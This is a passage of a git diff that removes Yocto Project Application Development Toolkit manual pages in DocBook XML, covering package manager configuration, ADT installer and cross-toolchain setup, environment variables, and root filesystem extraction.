-            <listitem><para><emphasis>RPM:</emphasis> A more widely known PMS intended for GNU/Linux
-                distributions.
-                This PMS works with files packaged in an <filename>.rpm</filename> format.
-                The build system currently installs through this PMS by default.
-                See <ulink url='http://en.wikipedia.org/wiki/RPM_Package_Manager'></ulink>
-                for more information about RPM.</para></listitem>
-            <listitem><para><emphasis>Debian:</emphasis> The PMS for Debian-based systems
-                is built on many PMS tools.
-                The lower-level PMS tool <filename>dpkg</filename> forms the base of the Debian PMS.
-                For information on dpkg see
-                <ulink url='http://en.wikipedia.org/wiki/Dpkg'></ulink>.</para></listitem>
-        </itemizedlist>
-    </para>
-</section>
-
-<section id='configuring-the-pms'>
-    <title>Configuring the PMS</title>
-
-    <para>
-        Whichever PMS you are using, you need to be sure that the
-        <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGE_CLASSES'><filename>PACKAGE_CLASSES</filename></ulink>
-        variable in the <filename>conf/local.conf</filename>
-        file is set to reflect that system.
-        The first value you choose for the variable specifies the package file format for the root
-        filesystem at sysroot.
-        Additional values specify additional formats for convenience or testing.
-        See the <filename>conf/local.conf</filename> configuration file for
-        details.
-    </para>
-
-    <note>
-        For build performance information related to the PMS, see the
-        "<ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-package'><filename>package.bbclass</filename></ulink>"
-        section in the Yocto Project Reference Manual.
-    </note>
-
-    <para>
-        As an example, consider a scenario where you are using OPKG and you want to add
-        the <filename>libglade</filename> package to the target sysroot.
-    </para>
-
-    <para>
-        First, you should generate the IPK file for the
-        <filename>libglade</filename> package and add it
-        into a working <filename>opkg</filename> repository.
-        Use these commands:
-        <literallayout class='monospaced'>
-     $ bitbake libglade
-     $ bitbake package-index
-        </literallayout>
-    </para>
-
-    <para>
-        Next, source the cross-toolchain environment setup script found in the
-        <ulink url='&YOCTO_DOCS_DEV_URL;#source-directory'>Source Directory</ulink>.
-        Follow that by setting up the installation destination to point to your
-        sysroot as <replaceable>sysroot_dir</replaceable>.
-        Finally, have an OPKG configuration file <replaceable>conf_file</replaceable>
-        that corresponds to the <filename>opkg</filename> repository you have just created.
-        The following command forms should now work:
-        <literallayout class='monospaced'>
-     $ opkg-cl –f <replaceable>conf_file</replaceable> -o <replaceable>sysroot_dir</replaceable> update
-     $ opkg-cl –f <replaceable>cconf_file</replaceable> -o <replaceable>sysroot_dir</replaceable> \
-        --force-overwrite install libglade
-     $ opkg-cl –f <replaceable>cconf_file</replaceable> -o <replaceable>sysroot_dir</replaceable> \
-        --force-overwrite install libglade-dbg
-     $ opkg-cl –f <replaceable>conf_file&gt; -o </replaceable>sysroot_dir&gt; \
-        --force-overwrite install libglade-dev
-        </literallayout>
-    </para>
-</section>
-</chapter>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/adt-manual/adt-prepare.xml b/documentation/adt-manual/adt-prepare.xml
deleted file mode 100644
index 65df1d03e6..0000000000
--- a/documentation/adt-manual/adt-prepare.xml
+++ /dev/null
@@ -1,999 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='adt-prepare'>
-
-<title>Preparing for Application Development</title>
-
-<para>
-    In order to develop applications, you need set up your host development system.
-    Several ways exist that allow you to install cross-development tools, QEMU, the
-    Eclipse Yocto Plug-in, and other tools.
-    This chapter describes how to prepare for application development.
-</para>
-
-<section id='installing-the-adt'>
-    <title>Installing the ADT and Toolchains</title>
-
-    <para>
-        The following list describes installation methods that set up varying
-        degrees of tool availability on your system.
-        Regardless of the installation method you choose,
-        you must <filename>source</filename> the cross-toolchain
-        environment setup script, which establishes several key
-        environment variables, before you use a toolchain.
-        See the
-        "<link linkend='setting-up-the-cross-development-environment'>Setting Up the Cross-Development Environment</link>"
-        section for more information.
-    </para>
-
-    <note>
-        <para>
-            Avoid mixing installation methods when installing toolchains for
-            different architectures.
-            For example, avoid using the ADT Installer to install some
-            toolchains and then hand-installing cross-development toolchains
-            by running the toolchain installer for different architectures.
-            Mixing installation methods can result in situations where the
-            ADT Installer becomes unreliable and might not install the
-            toolchain.
-        </para>
-
-        <para>
-            If you must mix installation methods, you might avoid problems by
-            deleting <filename>/var/lib/opkg</filename>, thus purging the
-            <filename>opkg</filename> package metadata.
-        </para>
-    </note>
-
-    <para>
-        <itemizedlist>
-            <listitem><para><emphasis>Use the ADT installer script:</emphasis>
-                This method is the recommended way to install the ADT because it
-                automates much of the process for you.
-                For example, you can configure the installation to install the QEMU emulator
-                and the user-space NFS, specify which root filesystem profiles to download,
-                and define the target sysroot location.</para></listitem>
-            <listitem><para><emphasis>Use an existing toolchain:</emphasis>
-                Using this method, you select and download an architecture-specific
-                toolchain installer and then run the script to hand-install the toolchain.
-                If you use this method, you just get the cross-toolchain and QEMU - you do not
-                get any of the other mentioned benefits had you run the ADT Installer script.</para></listitem>
-            <listitem><para><emphasis>Use the toolchain from within the Build Directory:</emphasis>
-                If you already have a
-                <ulink url='&YOCTO_DOCS_DEV_URL;#build-directory'>Build Directory</ulink>,
-                you can build the cross-toolchain within the directory.
-                However, like the previous method mentioned, you only get the cross-toolchain and QEMU - you
-                do not get any of the other benefits without taking separate steps.</para></listitem>
-        </itemizedlist>
-    </para>
-
-    <section id='using-the-adt-installer'>
-        <title>Using the ADT Installer</title>
-
-        <para>
-            To run the ADT Installer, you need to get the ADT Installer tarball, be sure
-            you have the necessary host development packages that support the ADT Installer,
-            and then run the ADT Installer Script.
-        </para>
-
-        <para>
-            For a list of the host packages needed to support ADT installation and use, see the
-            "ADT Installer Extras" lists in the
-            "<ulink url='&YOCTO_DOCS_REF_URL;#required-packages-for-the-host-development-system'>Required Packages for the Host Development System</ulink>" section
-            of the Yocto Project Reference Manual.
-        </para>
-
-        <section id='getting-the-adt-installer-tarball'>
-            <title>Getting the ADT Installer Tarball</title>
-
-            <para>
-                The ADT Installer is contained in the ADT Installer tarball.
-                You can get the tarball using either of these methods:
-                <itemizedlist>
-                    <listitem><para><emphasis>Download the Tarball:</emphasis>
-                        You can download the tarball from
-                        <ulink url='&YOCTO_ADTINSTALLER_DL_URL;'></ulink> into
-                        any directory.</para></listitem>
-                    <listitem><para><emphasis>Build the Tarball:</emphasis>
-                        You can use
-                        <ulink url='&YOCTO_DOCS_DEV_URL;#bitbake-term'>BitBake</ulink>
-                        to generate the tarball inside an existing
-                        <ulink url='&YOCTO_DOCS_DEV_URL;#build-directory'>Build Directory</ulink>.
-                        </para>
-                        <para>If you use BitBake to generate the ADT Installer
-                        tarball, you must <filename>source</filename> the
-                        environment setup script
-                        (<ulink url='&YOCTO_DOCS_REF_URL;#structure-core-script'><filename>&OE_INIT_FILE;</filename></ulink>
-                        or
-                        <ulink url='&YOCTO_DOCS_REF_URL;#structure-memres-core-script'><filename>oe-init-build-env-memres</filename></ulink>)
-                        located in the Source Directory before running the
-                        <filename>bitbake</filename> command that creates the
-                        tarball.</para>
-                        <para>The following example commands establish
-                        the
-                        <ulink url='&YOCTO_DOCS_DEV_URL;#source-directory'>Source Directory</ulink>,
-                        check out the current release branch, set up the
-                        build environment while also creating the default
-                        Build Directory, and run the
-                        <filename>bitbake</filename> command that results in the
-                        tarball
-                        <filename>poky/build/tmp/deploy/sdk/adt_installer.tar.bz2</filename>:
-                        <note>
-                            Before using BitBake to build the ADT tarball, be
-                            sure to make sure your
-                            <filename>local.conf</filename> file is properly
-                            configured.
-                            See the
-                            "<ulink url='&YOCTO_DOCS_REF_URL;#user-configuration'>User Configuration</ulink>"
-                            section in the Yocto Project Reference Manual for
-                            general configuration information.
-                        </note>
-                        <literallayout class='monospaced'>
-     $ cd ~
-     $ git clone git://git.yoctoproject.org/poky
-     $ cd poky
-     $ git checkout -b &DISTRO_NAME; origin/&DISTRO_NAME;
-     $ source &OE_INIT_FILE;
-     $ bitbake adt-installer
-                        </literallayout></para></listitem>
-                </itemizedlist>
-            </para>
-        </section>
-
-        <section id='configuring-and-running-the-adt-installer-script'>
-            <title>Configuring and Running the ADT Installer Script</title>
-
-            <para>
-                Before running the ADT Installer script, you need to unpack the tarball.
-                You can unpack the tarball in any directory you wish.
-                For example, this command copies the ADT Installer tarball from where
-                it was built into the home directory and then unpacks the tarball into
-                a top-level directory named <filename>adt-installer</filename>:
-                <literallayout class='monospaced'>
-     $ cd ~
-     $ cp poky/build/tmp/deploy/sdk/adt_installer.tar.bz2 $HOME
-     $ tar -xjf adt_installer.tar.bz2
-                </literallayout>
-                Unpacking it creates the directory <filename>adt-installer</filename>,
-                which contains the ADT Installer script (<filename>adt_installer</filename>)
-                and its configuration file (<filename>adt_installer.conf</filename>).
-            </para>
-
-            <para>
-                Before you run the script, however, you should examine the ADT Installer configuration
-                file and be sure you are going to get what you want.
-                Your configurations determine which kernel and filesystem image are downloaded.
-            </para>
-
-            <para>
-                The following list describes the configurations you can define for the ADT Installer.
-                For configuration values and restrictions, see the comments in
-                the <filename>adt-installer.conf</filename> file:
-
-                <itemizedlist>
-                    <listitem><para><filename>YOCTOADT_REPO</filename>: This area
-                        includes the IPKG-based packages and the root filesystem upon which
-                        the installation is based.
-                        If you want to set up your own IPKG repository pointed to by
-                        <filename>YOCTOADT_REPO</filename>, you need to be sure that the
-                        directory structure follows the same layout as the reference directory
-                        set up at <ulink url='http://adtrepo.yoctoproject.org'></ulink>.
-                        Also, your repository needs to be accessible through HTTP.</para></listitem>
-                    <listitem><para><filename>YOCTOADT_TARGETS</filename>: The machine
-                        target architectures for which you want to set up cross-development
-                        environments.</para></listitem>
-                    <listitem><para><filename>YOCTOADT_QEMU</filename>: Indicates whether
-                        or not to install the emulator QEMU.</para></listitem>
-                    <listitem><para><filename>YOCTOADT_NFS_UTIL</filename>: Indicates whether
-                        or not to install user-mode NFS.
-                        If you plan to use the Eclipse IDE Yocto plug-in against QEMU,
-                        you should install NFS.
-                        <note>To boot QEMU images using our userspace NFS server, you need
-                            to be running <filename>portmap</filename> or <filename>rpcbind</filename>.
-                            If you are running <filename>rpcbind</filename>, you will also need to add the
-                            <filename>-i</filename> option when <filename>rpcbind</filename> starts up.
-                            Please make sure you understand the security implications of doing this.
-                            You might also have to modify your firewall settings to allow
-                            NFS booting to work.</note></para></listitem>
-                    <listitem><para><filename>YOCTOADT_ROOTFS_</filename><replaceable>arch</replaceable>: The root
-                        filesystem images you want to download from the
-                        <filename>YOCTOADT_IPKG_REPO</filename> repository.</para></listitem>
-                    <listitem><para><filename>YOCTOADT_TARGET_SYSROOT_IMAGE_</filename><replaceable>arch</replaceable>: The
-                        particular root filesystem used to extract and create the target sysroot.
-                        The value of this variable must have been specified with
-                        <filename>YOCTOADT_ROOTFS_</filename><replaceable>arch</replaceable>.
-                        For example, if you downloaded both <filename>minimal</filename> and
-                        <filename>sato-sdk</filename> images by setting
-                        <filename>YOCTOADT_ROOTFS_</filename><replaceable>arch</replaceable>
-                        to "minimal sato-sdk", then <filename>YOCTOADT_ROOTFS_</filename><replaceable>arch</replaceable>
-                        must be set to either "minimal" or "sato-sdk".
-                        </para></listitem>
-                    <listitem><para><filename>YOCTOADT_TARGET_SYSROOT_LOC_</filename><replaceable>arch</replaceable>: The
-                        location on the development host where the target sysroot is created.
-                        </para></listitem>
-                </itemizedlist>
-            </para>
-
-            <para>
-                After you have configured the <filename>adt_installer.conf</filename> file,
-                run the installer using the following command:
-                <literallayout class='monospaced'>
-     $ cd adt-installer
-     $ ./adt_installer
-                </literallayout>
-                Once the installer begins to run, you are asked to enter the
-                location for cross-toolchain installation.
-                The default location is
-                <filename>/opt/poky/</filename><replaceable>release</replaceable>.
-                After either accepting the default location or selecting your
-                own location, you are prompted to run the installation script
-                interactively or in silent mode.
-                If you want to closely monitor the installation,
-                choose “I� for interactive mode rather than “S� for silent mode.
-                Follow the prompts from the script to complete the installation.
-            </para>
-
-            <para>
-                Once the installation completes, the ADT, which includes the
-                cross-toolchain, is installed in the selected installation
-                directory.
-                You will notice environment setup files for the cross-toolchain
-                in the installation directory, and image tarballs in the
-                <filename>adt-installer</filename> directory according to your
-                installer configurations, and the target sysroot located
-                according to the
-                <filename>YOCTOADT_TARGET_SYSROOT_LOC_</filename><replaceable>arch</replaceable>
-                variable also in your configuration file.
-            </para>
-         </section>
-    </section>
-
-    <section id='using-an-existing-toolchain-tarball'>
-        <title>Using a Cross-Toolchain Tarball</title>
-
-        <para>
-            If you want to simply install a cross-toolchain by hand, you can
-            do so by running the toolchain installer.
-            The installer includes the pre-built cross-toolchain, the
-            <filename>runqemu</filename> script, and support files.
-            If you use this method to install the cross-toolchain, you
-            might still need to install the target sysroot by installing and
-            extracting it separately.
-            For information on how to install the sysroot, see the
-            "<link linkend='extracting-the-root-filesystem'>Extracting the Root Filesystem</link>" section.
-        </para>
-
-        <para>
-            Follow these steps:
-            <orderedlist>
-                <listitem><para><emphasis>Get your toolchain installer using one of the following methods:</emphasis>
-                    <itemizedlist>
-                        <listitem><para>Go to
-                            <ulink url='&YOCTO_TOOLCHAIN_DL_URL;'></ulink>
-                            and find the folder that matches your host
-                            development system (i.e. <filename>i686</filename>
-                            for 32-bit machines or <filename>x86_64</filename>
-                            for 64-bit machines).</para>
-                            <para>Go into that folder and download the toolchain
-                            installer whose name includes the appropriate target
-                            architecture.
-                            The toolchains provided by the Yocto Project
-                            are based off of the
-                            <filename>core-image-sato</filename> image and
-                            contain libraries appropriate for developing
-                            against that image.
-                            For example, if your host development system is a
-                            64-bit x86 system and you are going to use
-                            your cross-toolchain for a 32-bit x86
-                            target, go into the <filename>x86_64</filename>
-                            folder and download the following installer:
-                            <literallayout class='monospaced'>
-     poky-glibc-x86_64-core-image-sato-i586-toolchain-&DISTRO;.sh
-                            </literallayout></para></listitem>
-                        <listitem><para>Build your own toolchain installer.
-                            For cases where you cannot use an installer
-                            from the download area, you can build your own as
-                            described in the
-                            "<link linkend='optionally-building-a-toolchain-installer'>Optionally Building a Toolchain Installer</link>"
-                            section.</para></listitem>
-                    </itemizedlist></para></listitem>
-                <listitem><para><emphasis>Once you have the installer, run it to install the toolchain:</emphasis>
-                    <note>
-                        You must change the permissions on the toolchain
-                        installer script so that it is executable.
-                    </note></para>
-                    <para>The following command shows how to run the installer
-                    given a toolchain tarball for a 64-bit x86 development host
-                    system and a 32-bit x86 target architecture.
-                    The example assumes the toolchain installer is located
-                    in <filename>~/Downloads/</filename>.
-                    <literallayout class='monospaced'>
-     $ ~/Downloads/poky-glibc-x86_64-core-image-sato-i586-toolchain-&DISTRO;.sh
-                    </literallayout>
-                    The first thing the installer prompts you for is the
-                    directory into which you want to install the toolchain.
-                    The default directory used is
-                    <filename>/opt/poky/&DISTRO;</filename>.
-                    If you do not have write permissions for the directory
-                    into which you are installing the toolchain, the
-                    toolchain installer notifies you and exits.
-                    Be sure you have write permissions in the directory and
-                    run the installer again.</para>
-                    <para>When the script finishes, the cross-toolchain is
-                    installed.
-                    You will notice environment setup files for the
-                    cross-toolchain in the installation directory.
-                    </para></listitem>
-            </orderedlist>
-        </para>
-    </section>
-
-    <section id='using-the-toolchain-from-within-the-build-tree'>
-        <title>Using BitBake and the Build Directory</title>
-
-        <para>
-            A final way of making the cross-toolchain available is to use BitBake
-            to generate the toolchain within an existing
-            <ulink url='&YOCTO_DOCS_DEV_URL;#build-directory'>Build Directory</ulink>.
-            This method does not install the toolchain into the default
-            <filename>/opt</filename> directory.
-            As with the previous method, if you need to install the target sysroot, you must
-            do that separately as well.
-        </para>
-
-        <para>
-            Follow these steps to generate the toolchain into the Build Directory:
-            <orderedlist>
-                <listitem><para><emphasis>Set up the Build Environment:</emphasis>
-                    Source the OpenEmbedded build environment setup
-                    script (i.e.
-                    <ulink url='&YOCTO_DOCS_REF_URL;#structure-core-script'><filename>&OE_INIT_FILE;</filename></ulink>
-                    or
-                    <ulink url='&YOCTO_DOCS_REF_URL;#structure-memres-core-script'><filename>oe-init-build-env-memres</filename></ulink>)
-                    located in the
-                    <ulink url='&YOCTO_DOCS_DEV_URL;#source-directory'>Source Directory</ulink>.
-                    </para></listitem>
-                <listitem><para><emphasis>Check your Local Configuration File:</emphasis>
-                    At this point, you should be sure that the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-MACHINE'><filename>MACHINE</filename></ulink> variable
-                    in the <filename>local.conf</filename> file found in the
-                    <filename>conf</filename> directory of the Build Directory
-                    is set for the target architecture.
-                    Comments within the <filename>local.conf</filename> file
-                    list the values you can use for the
-                    <filename>MACHINE</filename> variable.
-                    If you do not change the <filename>MACHINE</filename>
-                    variable, the OpenEmbedded build system uses
-                    <filename>qemux86</filename> as the default target
-                    machine when building the cross-toolchain.
-                    <note>
-                        You can populate the Build Directory with the
-                        cross-toolchains for more than a single architecture.
-                        You just need to edit the <filename>MACHINE</filename>
-                        variable in the <filename>local.conf</filename> file and
-                        re-run the <filename>bitbake</filename> command.
-                    </note></para></listitem>
-                <listitem><para><emphasis>Make Sure Your Layers are Enabled:</emphasis>
-                    Examine the <filename>conf/bblayers.conf</filename> file
-                    and make sure that you have enabled all the compatible
-                    layers for your target machine.
-                    The OpenEmbedded build system needs to be aware of each
-                    layer you want included when building images and
-                    cross-toolchains.
-                    For information on how to enable a layer, see the
-                    "<ulink url='&YOCTO_DOCS_DEV_URL;#enabling-your-layer'>Enabling Your Layer</ulink>"
-                    section in the Yocto Project Development Manual.
-                    </para></listitem>
-                <listitem><para><emphasis>Generate the Cross-Toolchain:</emphasis>
-                    Run <filename>bitbake meta-ide-support</filename> to
-                    complete the cross-toolchain generation.
-                    Once the <filename>bitbake</filename> command finishes,
-                    the cross-toolchain is
-                    generated and populated within the Build Directory.
-                    You will notice environment setup files for the
-                    cross-toolchain that contain the string
-                    "<filename>environment-setup</filename>" in the
-                    Build Directory's <filename>tmp</filename> folder.</para>
-                    <para>Be aware that when you use this method to install the
-                    toolchain, you still need to separately extract and install
-                    the sysroot filesystem.
-                    For information on how to do this, see the
-                    "<link linkend='extracting-the-root-filesystem'>Extracting the Root Filesystem</link>" section.
-                    </para></listitem>
-            </orderedlist>
-        </para>
-    </section>
-</section>
-
-<section id='setting-up-the-cross-development-environment'>
-    <title>Setting Up the Cross-Development Environment</title>
-
-    <para>
-        Before you can develop using the cross-toolchain, you need to set up the
-        cross-development environment by sourcing the toolchain's environment setup script.
-        If you used the ADT Installer or hand-installed cross-toolchain,
-        then you can find this script in the directory you chose for installation.
-        For this release, the default installation directory is
-        <filename>&YOCTO_ADTPATH_DIR;</filename>.
-        If you installed the toolchain in the
-        <ulink url='&YOCTO_DOCS_DEV_URL;#build-directory'>Build Directory</ulink>,
-        you can find the environment setup
-        script for the toolchain in the Build Directory's <filename>tmp</filename> directory.
-    </para>
-
-    <para>
-        Be sure to run the environment setup script that matches the
-        architecture for which you are developing.
-        Environment setup scripts begin with the string
-        "<filename>environment-setup</filename>" and include as part of their
-        name the architecture.
-        For example, the toolchain environment setup script for a 64-bit
-        IA-based architecture installed in the default installation directory
-        would be the following:
-        <literallayout class='monospaced'>
-     &YOCTO_ADTPATH_DIR;/environment-setup-x86_64-poky-linux
-        </literallayout>
-        When you run the setup script, many environment variables are
-        defined:
-        <literallayout class='monospaced'>
-     <ulink url='&YOCTO_DOCS_REF_URL;#var-SDKTARGETSYSROOT'><filename>SDKTARGETSYSROOT</filename></ulink> - The path to the sysroot used for cross-compilation
-     <ulink url='&YOCTO_DOCS_REF_URL;#var-PKG_CONFIG_PATH'><filename>PKG_CONFIG_PATH</filename></ulink> - The path to the target pkg-config files
-     <ulink url='&YOCTO_DOCS_REF_URL;#var-CONFIG_SITE'><filename>CONFIG_SITE</filename></ulink> - A GNU autoconf site file preconfigured for the target
-     <ulink url='&YOCTO_DOCS_REF_URL;#var-CC'><filename>CC</filename></ulink> - The minimal command and arguments to run the C compiler
-     <ulink url='&YOCTO_DOCS_REF_URL;#var-CXX'><filename>CXX</filename></ulink> - The minimal command and arguments to run the C++ compiler
-     <ulink url='&YOCTO_DOCS_REF_URL;#var-CPP'><filename>CPP</filename></ulink> - The minimal command and arguments to run the C preprocessor
-     <ulink url='&YOCTO_DOCS_REF_URL;#var-AS'><filename>AS</filename></ulink> - The minimal command and arguments to run the assembler
-     <ulink url='&YOCTO_DOCS_REF_URL;#var-LD'><filename>LD</filename></ulink> - The minimal command and arguments to run the linker
-     <ulink url='&YOCTO_DOCS_REF_URL;#var-GDB'><filename>GDB</filename></ulink> - The minimal command and arguments to run the GNU Debugger
-     <ulink url='&YOCTO_DOCS_REF_URL;#var-STRIP'><filename>STRIP</filename></ulink> - The minimal command and arguments to run 'strip', which strips symbols
-     <ulink url='&YOCTO_DOCS_REF_URL;#var-RANLIB'><filename>RANLIB</filename></ulink> - The minimal command and arguments to run 'ranlib'
-     <ulink url='&YOCTO_DOCS_REF_URL;#var-OBJCOPY'><filename>OBJCOPY</filename></ulink> - The minimal command and arguments to run 'objcopy'
-     <ulink url='&YOCTO_DOCS_REF_URL;#var-OBJDUMP'><filename>OBJDUMP</filename></ulink> - The minimal command and arguments to run 'objdump'
-     <ulink url='&YOCTO_DOCS_REF_URL;#var-AR'><filename>AR</filename></ulink> - The minimal command and arguments to run 'ar'
-     <ulink url='&YOCTO_DOCS_REF_URL;#var-NM'><filename>NM</filename></ulink> - The minimal command and arguments to run 'nm'
-     <ulink url='&YOCTO_DOCS_REF_URL;#var-TARGET_PREFIX'><filename>TARGET_PREFIX</filename></ulink> - The toolchain binary prefix for the target tools
-     <ulink url='&YOCTO_DOCS_REF_URL;#var-CROSS_COMPILE'><filename>CROSS_COMPILE</filename></ulink> - The toolchain binary prefix for the target tools
-     <ulink url='&YOCTO_DOCS_REF_URL;#var-CONFIGURE_FLAGS'><filename>CONFIGURE_FLAGS</filename></ulink> - The minimal arguments for GNU configure
-     <ulink url='&YOCTO_DOCS_REF_URL;#var-CFLAGS'><filename>CFLAGS</filename></ulink> - Suggested C flags
-     <ulink url='&YOCTO_DOCS_REF_URL;#var-CXXFLAGS'><filename>CXXFLAGS</filename></ulink> - Suggested C++ flags
-     <ulink url='&YOCTO_DOCS_REF_URL;#var-LDFLAGS'><filename>LDFLAGS</filename></ulink> - Suggested linker flags when you use CC to link
-     <ulink url='&YOCTO_DOCS_REF_URL;#var-CPPFLAGS'><filename>CPPFLAGS</filename></ulink> - Suggested preprocessor flags
-        </literallayout>
-    </para>
-</section>
-
-<section id='securing-kernel-and-filesystem-images'>
-    <title>Securing Kernel and Filesystem Images</title>
-
-    <para>
-        You will need to have a kernel and filesystem image to boot using your
-        hardware or the QEMU emulator.
-        Furthermore, if you plan on booting your image using NFS or you want to use the root filesystem
-        as the target sysroot, you need to extract the root filesystem.
-    </para>
-
-    <section id='getting-the-images'>
-        <title>Getting the Images</title>
-
-        <para>
-            To get the kernel and filesystem images, you either have to build them or download
-            pre-built versions.
-            For an example of how to build these images, see the
-            "<ulink url='&YOCTO_DOCS_QS_URL;#qs-buiding-images'>Buiding Images</ulink>"
-            section of the Yocto Project Quick Start.
-            For an example of downloading pre-build versions, see the
-            "<link linkend='using-pre-built'>Example Using Pre-Built Binaries and QEMU</link>"
-            section.
-        </para>
-
-        <para>
-            The Yocto Project ships basic kernel and filesystem images for several
-            architectures (<filename>x86</filename>, <filename>x86-64</filename>,
-            <filename>mips</filename>, <filename>powerpc</filename>, and <filename>arm</filename>)
-            that you can use unaltered in the QEMU emulator.
-            These kernel images reside in the release
-            area - <ulink url='&YOCTO_MACHINES_DL_URL;'></ulink>
-            and are ideal for experimentation using Yocto Project.
-            For information on the image types you can build using the OpenEmbedded build system,
-            see the
-            "<ulink url='&YOCTO_DOCS_REF_URL;#ref-images'>Images</ulink>"
-            chapter in the Yocto Project Reference Manual.
-        </para>
-
-        <para>
-            If you are planning on developing against your image and you are not
-            building or using one of the Yocto Project development images
-            (e.g. <filename>core-image-*-dev</filename>), you must be sure to
-            include the development packages as part of your image recipe.
-        </para>
-
-        <para>
-            If you plan on remotely deploying and debugging your
-            application from within the Eclipse IDE, you must have an image
-            that contains the Yocto Target Communication Framework (TCF) agent
-            (<filename>tcf-agent</filename>).
-            You can do this by including the <filename>eclipse-debug</filename>
-            image feature.
-            <note>
-                See the
-                "<ulink url='&YOCTO_DOCS_REF_URL;#ref-features-image'>Image Features</ulink>"
-                section in the Yocto Project Reference Manual for information on
-                image features.
-            </note>
-            To include the <filename>eclipse-debug</filename> image feature,
-            modify your <filename>local.conf</filename> file in the
-            <ulink url='&YOCTO_DOCS_DEV_URL;#build-directory'>Build Directory</ulink>
-            so that the
-            <ulink url='&YOCTO_DOCS_REF_URL;#var-EXTRA_IMAGE_FEATURES'><filename>EXTRA_IMAGE_FEATURES</filename></ulink>
-            variable includes the "eclipse-debug" feature.
-            After modifying the configuration file, you can rebuild the image.
-            Once the image is rebuilt, the <filename>tcf-agent</filename>
-            will be included in the image and is launched automatically after
-            the boot.
-        </para>
-    </section>
-
-    <section id='extracting-the-root-filesystem'>
-        <title>Extracting the Root Filesystem</title>
-
-        <para>
-            If you install your toolchain by hand or build it using BitBake and
-            you need a root filesystem, you need to extract it separately.
-            If you use the ADT Installer to install the ADT, the root
-            filesystem is automatically extracted and installed.
-        </para>
-
-        <para>
-            Here are some cases where you need to extract the root filesystem:
-            <itemizedlist>
-                <listitem><para>You want to boot the image using NFS.
-                    </para></listitem>
-                <listitem><para>You want to use the root filesystem as the
-                    target sysroot.
-                    For example, the Eclipse IDE environment with the Eclipse
-                    Yocto Plug-in installed allows you to use QEMU to boot
-                    under NFS.</para></listitem>
-                <listitem><para>You want to develop your target application
-                    using the root filesystem as the target sysroot.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-
-        <para>
-            To extract the root filesystem, first <filename>source</filename>
-            the cross-development environment setup script to establish
-            necessary environment variables.
-            If you built the toolchain in the Build Directory, you will find
-            the toolchain environment script in the
-            <filename>tmp</filename> directory.
-            If you installed the toolchain by hand, the environment setup
-            script is located in <filename>/opt/poky/&DISTRO;</filename>.
-        </para>
-
-        <para>
-            After sourcing the environment script, use the
-            <filename>runqemu-extract-sdk</filename> command and provide the
-            filesystem image.
-        </para>
-
-        <para>
-            Following is an example.
-            The second command sets up the environment.
-            In this case, the setup script is located in the
-            <filename>/opt/poky/&DISTRO;</filename> directory.
-            The third command extracts the root filesystem from a previously
-            built filesystem that is located in the
-            <filename>~/Downloads</filename> directory.
-            Furthermore, this command extracts the root filesystem into the
-            <filename>qemux86-sato</filename> directory:
-            <literallayout class='monospaced'>
-     $ cd ~
-     $ source /opt/poky/&DISTRO;/environment-setup-i586-poky-linux
-     $ runqemu-extract-sdk \
-        ~/Downloads/core-image-sato-sdk-qemux86-2011091411831.rootfs.tar.bz2 \
-        $HOME/qemux86-sato
-            </literallayout>
-            You could now point to the target sysroot at
-            <filename>qemux86-sato</filename>.
-        </para>
-    </section>
-</section>
-
-<section id='optionally-building-a-toolchain-installer'>
-    <title>Optionally Building a Toolchain Installer</title>
-
-    <para>
-        As an alternative to locating and downloading a toolchain installer,
-        you can build the toolchain installer if you have a
-        <ulink url='&YOCTO_DOCS_DEV_URL;#build-directory'>Build Directory</ulink>.
-        <note>
-            Although not the preferred method, it is also possible to use
-            <filename>bitbake meta-toolchain</filename> to build the toolchain
-            installer.
-            If you do use this method, you must separately install and extract
-            the target sysroot.
-            For information on how to install the sysroot, see the
-            "<link linkend='extracting-the-root-filesystem'>Extracting the Root Filesystem</link>"
-            section.
-        </note>
-    </para>
-
-    <para>
-        To build the toolchain installer and populate the SDK image, use the
-        following command:
-        <literallayout class='monospaced'>
-     $ bitbake <replaceable>image</replaceable> -c populate_sdk
-        </literallayout>
-        The command results in a toolchain installer that contains the sysroot
-        that matches your target root filesystem.
-    </para>
-
-    <para>
-        Another powerful feature is that the toolchain is completely
-        self-contained.
-        The binaries are linked against their own copy of
-        <filename>libc</filename>, which results in no dependencies
-        on the target system.
-        To achieve this, the pointer to the dynamic loader is
-        configured at install time since that path cannot be dynamically
-        altered.
-        This is the reason for a wrapper around the
-        <filename>populate_sdk</filename> archive.
-    </para>
-
-    <para>
-        Another feature is that only one set of cross-canadian toolchain
-        binaries are produced per architecture.
-        This feature takes advantage of the fact that the target hardware can
-        be passed to <filename>gcc</filename> as a set of compiler options.
-        Those options are set up by the environment script and contained in
-        variables such as
-        <ulink url='&YOCTO_DOCS_REF_URL;#var-CC'><filename>CC</filename></ulink>
-        and
-        <ulink url='&YOCTO_DOCS_REF_URL;#var-LD'><filename>LD</filename></ulink>.
-        This reduces the space needed for the tools.
-        Understand, however, that a sysroot is still needed for every target
-        since those binaries are target-specific.
-    </para>
-
-    <para>
-         Remember, before using any BitBake command, you
-         must source the build environment setup script
-         (i.e.
-         <ulink url='&YOCTO_DOCS_REF_URL;#structure-core-script'><filename>&OE_INIT_FILE;</filename></ulink>
-         or
-         <ulink url='&YOCTO_DOCS_REF_URL;#structure-memres-core-script'><filename>oe-init-build-env-memres</filename></ulink>)
-         located in the Source Directory and you must make sure your
-         <filename>conf/local.conf</filename> variables are correct.
-         In particular, you need to be sure the
-         <ulink url='&YOCTO_DOCS_REF_URL;#var-MACHINE'><filename>MACHINE</filename></ulink>
-         variable matches the architecture for which you are building and that
-         the
-         <ulink url='&YOCTO_DOCS_REF_URL;#var-SDKMACHINE'><filename>SDKMACHINE</filename></ulink>
-         variable is correctly set if you are building a toolchain designed to
-         run on an architecture that differs from your current development host
-         machine (i.e. the build machine).
-    </para>
-
-    <para>
-        When the <filename>bitbake</filename> command completes, the toolchain
-        installer will be in
-        <filename>tmp/deploy/sdk</filename> in the Build Directory.
-        <note>
-            By default, this toolchain does not build static binaries.
-            If you want to use the toolchain to build these types of libraries,
